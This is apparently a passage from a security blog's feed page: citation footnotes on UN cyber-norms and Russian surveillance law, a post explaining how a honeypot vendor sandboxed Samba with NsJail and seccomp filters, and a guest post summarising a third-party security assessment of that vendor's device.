[9] Col Gary D Brown has produced consistently excellent work on this subject. See, e.g., Gary D Brown, "The Cyber Longbow & Other Information Strategies: U.S. National Security and Cyberspace” (28 April 2017). 5 PENN. ST. J.L. & INT’L AFF. 1, 2017, https://ssrn.com/abstract=2971667; Gary D Brown “Spying and Fighting in Cyberspace: What is Which?” (1 April 2016). 8 J. NAT’L SECURITY L. & POL’Y, 2016, https://ssrn.com/abstract=2761460; Gary D Brown and Andrew O Metcalf, “Easier Said Than Done : Legal Review of Cyber Weapons” (12 February 2014). 7 J. NAT’L SECURITY L. & POL’Y, 2014, https://ssrn.com/abstract=2400530. See also, Gary D Brown, panel remarks, ’New challenges to the laws of war : a discussion with Ambassador Valentin Zellweger,’ (Washington, DC : CSIS), 30 October 2015, https://www.youtube.com/watch?v=jV-A21jQWnQ&feature=youtu.be&t=27m36s.
[10] Michele Markoff, panel remarks, ‘Cyber norms revisited : international cybersecurity and the way forward’ (Washington, DC : Carnegie Endowment for Int’l Peace) 6 February 2017, https://www.youtube.com/watch?v=nAuehrVCBBU&feature=youtu.be&t=4m10s.
[11] United Nations, General Assembly, Letter dated 23 September 1998 from the Permanent Representative of the Russian Federation to the United Nations addressed to the Secretary-General, UN GAOR 53rd Sess., Agenda Item 63, UN Doc. A/C.1/53/3 (30 September 1998), https://undocs.org/A/C.1/53/3.
[12] ibid., (3)(c).
[13] GA Res. 53/70, 'Developments in telecommunications and information in the context of international security,’ UN GAOR 53rd Sess., Agenda Item 63, UN Doc. A/RES/53/70 (4 December 1998), https://undocs.org/a/res/53/70.
[14] See GA Res. 54/49 of 1 December 1999, 55/28 of 20 November 2000, 56/19 of 29 November 2001, 57/53 of 22 November 2002, 58/32 of 8 December 2003, 59/61 of 3 December 2004, 60/45 of 8 December 2005, 61/54 of 6 December 2006, 62/17 of 5 December 2007, 63/37 of 2 December 2008, 64/25 of 2 December 2009, 65/41 of 8 December 2010, 66/24 of 2 December 2011, 67/27 of 3 December 2012, 68/243 of 27 December 2013, 69/28 of 2 December 2014, 70/237 of 23 December 2015, and 71/28 of 5 December 2016.
[15] This assessment is somewhat complicated. Accepting any or all of the proposed definitions, codes of conduct, &c. proffered by the Russian Federation over the years may have precluded some actions allegedly taken by the United States, but unambiguously would have prohibited the massive-scale disinformation and influence operations that have become a hallmark of Russian power projection abroad. Similarly, Russian innovations in modular malware with the demonstrated purpose and capability to perturb, damage, or destroy physical critical infrastructure systems would have been contraindicated by their own language.
[16] See, e.g., the Russian reply to 'Developments in telecommunications and information in the context of international security,’ Report of the Secretary-General, UN GAOR 54th Sess., Agenda Item 71, UN Doc. A/54/213 (9 June 1999), pp. 8-10, https://undocs.org/a/54/213; the Russian reply to 'Developments in telecommunications and information in the context of international security,’ Report of the Secretary-General, UN GAOR 55th Sess., Agenda Item 68, UN Doc. A/55/140 (12 May 2000), pp. 3-7, https://undocs.org/a/55/140; the Swedish reply (on behalf of Member States of the European Union) to 'Developments in telecommunications and information in the context of international security,’ Report of the Secretary-General, UN GAOR 56th Sess., Agenda Item 69, UN Doc. A/56/164 (26 June 2001), pp. 4-5, https://undocs.org/a/56/164; and the Russian reply to ibid., UN GAOR 56th Sess., Agenda Item 69, UN Doc. A/56/164/Add.1 (21 June 2001), pp. 2-6, https://undocs.org/a/56/164/add.1.
[17] United Nations, General Assembly, Letter dated 9 January 2015 from the Permanent Representatives of China, Kazakhstan, Kyrgyzstan, the Russian Federation, Tajikistan and Uzbekistan to the United Nations addressed to the Secretary-General, UN GAOR 69th Sess., Agenda Item 91, UN Doc. A/69/723 (9 January 2015), https://undocs.org/a/69/723.
[18] States’ replies since the 65th Session (2010) indexed at https://www.un.org/disarmament/topics/informationsecurity/.
[19] See, e.g., Arun Mohan Sukumar, ‘The UN GGE failed. Is international law in cyberspace doomed as well?,’ Lawfare, 4 July 2017, https://lawfareblog.com/un-gge-failed-international-law-cyberspace-doomed-well, and Elaine Korzak, The Debate : ‘UN GGE on cybersecurity : the end of an era?,’ The Diplomat, 31 July 2017, https://thediplomat.com/2017/07/un-gge-on-cybersecurity-have-china-and-russia-just-made-cyberspace-less-safe/.
[20] Prior to the 2014 Olympics in Sochi, US-CERT warned travellers that
Russia has a national system of lawful interception of all electronic communications. The System of Operative-Investigative Measures, or SORM, legally allows the Russian FSB to monitor, intercept, and block any communication sent electronically (i.e. cell phone or landline calls, internet traffic, etc.). SORM-1 captures telephone and mobile phone communications, SORM-2 intercepts internet traffic, and SORM-3 collects information from all forms of communication, providing long-term storage of all information and data on subscribers, including actual recordings and locations. Reports of Rostelecom, Russia’s national telecom operator, installing deep packet inspection (DPI ) means authorities can easily use key words to search and filter communications. Therefore, it is important that attendees understand communications while at the Games should not be considered private.’
Department of Homeland Security, US-CERT, Security Tip (ST14-01) ’Sochi 2014 Olympic Games’ (NCCIC Watch & Warning : 04 February 2014). https://www.us-cert.gov/ncas/tips/ST14-001 See, also, Andrei Soldatov and Irina Borogan, The Red Web : the struggle between Russia’s digital dictators and the new online revolutionaries, (New York : Public Affairs, 2017 [2015]).
[21] In the United States, this has become a question of the extraterritorial application of the Stored Communications Act (18 USC § 2703) in the presence of a warrant, probable cause, &c. dressed up as a privacy debate. See Andrew Keane Woods, ‘A primer on Microsoft Ireland, the Supreme Court’s extraterritorial warrant case,’ Lawfare, 16 October 2017, https://lawfareblog.com/primer-microsoft-ireland-supreme-courts-extraterritorial-warrant-case.
[22] At the time of writing, eight Russian law enforcement and security agencies are granted direct access to SORM : the Ministry of Internal Affairs (MVD), Federal Security Service (FSB), Federal Protective Service (FSO), Foreign Intelligence Service (SVR), Federal Customs Service (FTS), Federal Drug Control Service (FSKN), Federal Penitentiary Service (FSIN), and the Main Intelligence Directorate of the General Staff (GRU). Federal Laws 374-FZ and 375-FZ of 6th July 2016 ('On Amendments to the Criminal Code of the Russian Federation and the Code of Criminal Procedure of the Russian Federation with regard to establishing additional measures to counter terrorism and ensure public security’), also known as the ‘Yarovaya laws,’ will enter into force on 1st July 2018; these laws substantially eliminate warrant requirements for communications and metadata requests to Russian telecommunications companies and ISPs, and additionally impose retention and decryption for all voice, text, video, and image communications. See, e.g., DR Analytica, report, ‘Yarovaya law : one year after,’ 24 April 2017, https://analytica.digital.report/en/2017/04/24/yarovaya-law-one-year-after/.

Sandboxing: a dig into building your security pit

$
0
0

Introduction

Sandboxes are a good idea. Whether it's improving kids’ immune systems, or isolating your apps from the rest of the system, sandboxes just make sense. Despite their obvious benefits, they are still relatively uncommon. We think this is because they are still relatively obscure for most developers and hope this post will fix that.

Sandboxes? What’s that?

Software sandboxes isolate a process from the rest of the system, constraining the process’ access to the parts of the system that it needs and denying access to everything else. A simple example of this would be opening a PDF in (a modern version of) Adobe Reader. Since Adobe Reader now makes use of a sandbox, the document is opened in a process running in its own constrained world so that it is isolated from the rest of the system. This limits the harm that a malicious document can cause and is one of the reasons why malicious PDFs have dropped from being the number-1 attack vector seen in the wild as more and more users updated to sandbox-enabled versions of Adobe-Reader.

It's worth noting that sandboxes aren't magic, they simply limit the tools available to an attacker and limit an exploit’s immediate blast-radius. Bugs in the sandboxing process can still yield full access to key parts of the system rendering the sandbox almost useless.

Sandboxes in Canary

Long time readers will know that Canary is our well-loved honeypot solution. (If you are interested in breach detection that’s quick to deploy and works, check us out at https://canary.tools/)


A Canary is a high quality, mixed interaction honeypot. It’s a small device that you plug into your network which is then able to imitate a large range of machines (a printer/ your CEO's laptop/ a file server, etc). Once configured it will run zero or more services such as SSH, Telnet, a database or Windows File Sharing. When people interact with these fake hosts and fake services, you get an alert (and a high quality signal that you should cancel your weekend plans).

Almost all of our services are implemented in a memory safe language, but in the event that customers want a Windows File Share, we rely on the venerable Samba project (before settling on Samba, we examined other SMB possibilities, like the excellent impacket library, but Samba won since our Canaries (and their file shares) can be enrolled into Active Directory too). Since Samba is running as its own service and we don't have complete control over its internal workings, it becomes a prime candidate for sandboxing: we wanted to be able to restrict it's access to the rest of the system in case it is ever compromised.

Sandboxing 101

As a very brief introduction to sandboxing we'll explain some key parts of what Linux has to offer (a quick Google search will yield far more comprehensive articles, but one interesting resource, although not Linux focused, is this video about Microsoft Sandbox Mitigations).

Linux offers several ways to limit processes which we took into consideration when deciding on a solution that would suit us. When implementing a sandbox solution you would chose a combination of these depending on your environment and what makes sense.


Control groups

Control groups (cgroups) look at limiting and controlling access and usage of resources such as CPU, memory, disk, network, etc.


Chroot

This involves changing the apparent root directory on a file-system that the process can see. It ensures that the process does not have access to the whole file system, but only parts that it should be able to see. Chroot was one of the first attempts at sandboxes in the Unix world, but it was quickly determined that it wasn’t enough to constrain attackers.


Seccomp

Standing for "secure computing mode", this lets you limit the syscalls that a process can make. Limiting syscalls means that a process will only be able to perform system operations that you expect to be able to perform so if an attacker compromises your application, they won't be able to run wild.


Capabilities

These are the set of privileged operations that can be performed on the Linux system. Some capabilities include setuid, chroot and chown. For a full list you can take a look at the source here. However, they’re also not a panacea and spender has shown (frequently) how Capabilities can be leveraged into full Capabilities.


Namespaces

Without namespaces, any processes would be able to see all processes' system resource information. Namespaces virtualise resources like hostnames, user IDs or network resources so that a process cannot see information from other processes.

Adding sandboxing to your application in the past meant using some of these primitives natively (which probably seemed hairy for most developers). Fortunately, these days, there are a number of projects that wrap them up in easy-to-use packages.



Choosing our solution

We needed to find a solution that would work well for us now, but would also allow us to easily expand once the need arises without requiring a rebuild from the ground up.

The solution we wanted would need to at least address Seccomp filtering and a form of chroot/pivot_root. Filtering syscalls is easy to control if you can get the full profile of a service and once filtered you can sleep a little safer knowing the service can't perform syscalls that it shouldn't. Limiting the view of the filesystem was another easy choice for us. Samba only needs access to specific directories and files, and lots of those files can also be set to read-only.

We evaluated a number of options, and decided that the final solution should:

  • Isolate the process (Samba)
  • Retain the real hostname
  • Still be able to interact with a non-isolated process
Another process had to be able to intercept Samba network traffic which meant we couldn’t put it in a network namespace without bringing that extra process in.

This ruled out something like Docker, as although it provided an out-of-the-box high level of isolation (which is perfect for many situations), we would have had to turn off a lot of the features to get our app to play nicely.

Systemd and nsroot (which looks abandoned) both focused more on specific isolation techniques (seccomp filtering for Systemd and namespace isolation for nsroot) but weren’t sufficient for our use case.

We then looked at NsJail and Firejail (Google vs Mozilla, although that played no part in our decision). Both were fairly similar and provided us with flexibility in terms of what we could limit, putting them a cut above the rest.

In the end, we decided on NsJail, but since they were so similar, we could have easily gone the other way, i.e. YMMV


NsJail
NsJail, as simply stated in its overview, "is a process isolation tool for Linux" developed by the team at Google (though it's not officially recognised as a Google product). It provides isolation for namespaces, file-system constraints, resource limits, seccomp filters, cloned/isolated ethernet interfaces and control groups.

Furthermore, it uses kafel (another non-official Google product) which allows you to define syscall filtering policies in a config file, making it easy to manage/maintain/reuse/expand your configuration.

A simple example of using NsJail to isolate processes would be:

./nsjail -Mo --chroot /var/safe_directory --user 99999 --group 99999 -- /bin/sh -i
Here we are telling NsJail to:
-Mo:               launch a single process using clone/execve

--chroot:          set /var/safe_directory as the new root directory for the process

--user/--group:    set the uid and gid to 99999 inside the jail

-- /bin/sh -i:     our sandboxed process (in this case, launch an interactive shell)
We are setting our chroot to /var/safe_directory. It is a valid chroot that we have created beforehand. You can instead use  --chroot / for your testing purposes (in which case you really aren’t using the chroot at all).

If you launch this and run ps aux andidyou’ll see something like the below:
$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
99999        1  0.0  0.1   1824  1080 ?        SNs  12:26   0:00 /bin/sh -i
99999       11  0.0  0.1   3392  1852 ?        RN   12:32   0:00 ps ux
$ id
uid=99999 gid=99999 groups=99999
What you can see is that you are only able to view processes initiated inside the jail.

Now lets try adding a filter to this:

./nsjail --chroot /var/safe_directory  --user 99999 --group 99999 --seccomp_string 'POLICY a { ALLOW { write, execve, brk, access, mmap, open, newfstat, close, read, mprotect, arch_prctl, munmap, getuid, getgid, getpid, rt_sigaction, geteuid, getppid, getcwd, getegid, ioctl, fcntl, newstat, clone, wait4, rt_sigreturn, exit_group } } USE a DEFAULT KILL' -- /bin/sh -i
Here we are telling NsJail to:
-Mo:               launch a single process using clone/execve

--chroot:          set /var/safe_directory as the new root directory for the process

--user/--group:    set the uid and gid to 99999 inside the jail

--seccomp_string:  use the provided seccomp policy

-- /bin/sh -i:     our sandboxed process (in this case, launch an interactive shell)
If you try run idnow you should see it fail. This is because we have not given it permission to use the required syscalls:
$ id
Bad system call
The idea for us then would be to use NsJail to execute smbd as well as nmbd (both are needed for our Samba setup) and only allow expected syscalls.

Building our solution
Starting with a blank config file, and focusing on smbd, we began adding restrictions to lock down the service.

First we built the the seccomp filter list to ensure the process only had access to syscalls that were needed. This was easily obtained using perf:

perf record -e 'raw_syscalls:sys_enter' -- /usr/sbin/smbd -F
This recorded all syscalls used by smbd into perf's format. To output the syscalls in a readable list format we used:
perf script | grep -oP "(?<= NR )[0-9]+" | sort -nu
One thing to mention here is that syscall numbers can be named differently depending where you look. Even just between `strace` and `nsjail`, a few syscall names have slight variations from the names in the Linux source. This means that if you use the syscall names you won't be able to directly use the exact same list between different tools, but may need to rename a few of them. If you are worried about this, you can opt instead to use the syscall numbers. These are a robust, tool-independent way of identifying syscalls.

After we had our list in place, we set about limiting FS access as well as fiddling with some final settings in our policy to ensure it was locked down as tight as possible.

A rather interesting way to test that the config file was working as expected was to launch a shell using the config and test the protections manually:

./nsjail --config smb.cfg -- /bin/sh -i
Once the policy was tested and we were happy that smbd was running as expected, we did the same for nmbd.

With both services sandboxed we performed a couple of long running tests to ensure we hadn't missed anything. This included leaving the services running over the weekend as well as testing them out by connecting to them from different systems. After all the testing and not finding anything broken, we were happy to sign off.

What does this mean for us?

Most canned exploits against Samba expect a stock system with access to system resources. At some point in the future, when the next Samba 0-day surfaces, there’s a good chance that generic exploits against our Samba will fail as it tries to exercise syscalls we haven’t expressly permitted. But even if an attacker were to compromise Samba, and spawn himself a shell, this shell would be of limited utility with a constrained view of the filesystem and the system in general.

What does this mean for you?
We stepped you through our process of implementing a sandbox for our Samba service. The aim was to get you thinking about your own environment and how sandboxing could play a role in securing your applications. We wanted to show you that it isn't an expensive or overly complicated task. You should try it, and if you do, drop us a note to let us know how it went!


Article 0

$
0
0

A third party view on the security of the Canaries

(Guest post by Ollie Whitehouse)

tl;dr

Thinkst engaged NCC Group to perform a third party assessment of the security of their Canary appliance. The Canaries came out of the assessment well. When compared in a subjective manner to the vast majority of embedded devices and/or security products we have assessed and researched over the last 18 years they were very good.

Who is NCC Group and who am I?

Firstly, it is prudent to introduce myself and the company I represent. My name is Ollie Whitehouse and I am the Global CTO for NCC Group. My career in cyber spans over 20 years in areas such as applied research, internal product security teams at companies like BlackBerry and, of course, consultancy. NCC Group is a global professional and managed security firm with its headquarters in the UK and offices in the USA, Canada, Netherlands, Denmark, Spain, Singapore and Australia to mention but a few.

What were we engaged to do?

Quite simply we were tasked to see if we could identify any vulnerabilities in the Canary appliance that would have a meaningful impact on real-world deployments in real-world threat scenarios. The assessment was entirely white box (i.e. undertaken with full knowledge and code access etc.)

Specifically the solution was assessed for:

·       Common software vulnerabilities

·       Configuration issues

·       Logic issues including those involving the enrolment and update processes

·       General privacy and integrity of the solution

The solution was NOT assessed for:

·       The efficacy of Canary in an environment

·       The ability to fingerprint and detect a Canary

·       Operational security of the Thinkst SaaS

What did NCC Group find?

NCC Group staffed a team with a combined experience of over 30 years in software security assessments to undertake this review for what I consider a reasonable amount of time given the code base size and product complexity.

We found a few minor issues, including a few broken vulnerability chains, but overall we did not find anything that would facilitate a remote breach.

While we would never make any warranties it is clear from the choice of programming languages, design and implementation that there is a defence in depth model in place. The primitives around cryptography usage are also robust, avoiding many of the pitfalls seen more widely in the market.

The conclusion of our evaluation is that the Canary platform is well designed and well implemented from a security perspective. Although there were some vulnerabilities, none of these were significant, none would be accessible to an unauthenticated attacker and none affected the administrative console. The Canary device is robust from a product security perspective based on current understanding.

So overall?

The device platform and its software stack (outside of the base OS) has been designed and implemented by a team at Thinkst with a history in code product assessments and penetration testing (a worthy opponent one might argue), and this shows in the positive results from our evaluation.

Overall, Thinkst have done a good job and shown they are invested in producing not only a security product but also a secure product.

_________

<haroon> Are you a customer who wishes to grab a copy of the report? Mail us and we will make it happen.


RSAC 2018 - A Recap...

Viewing all 105 articles
Browse latest View live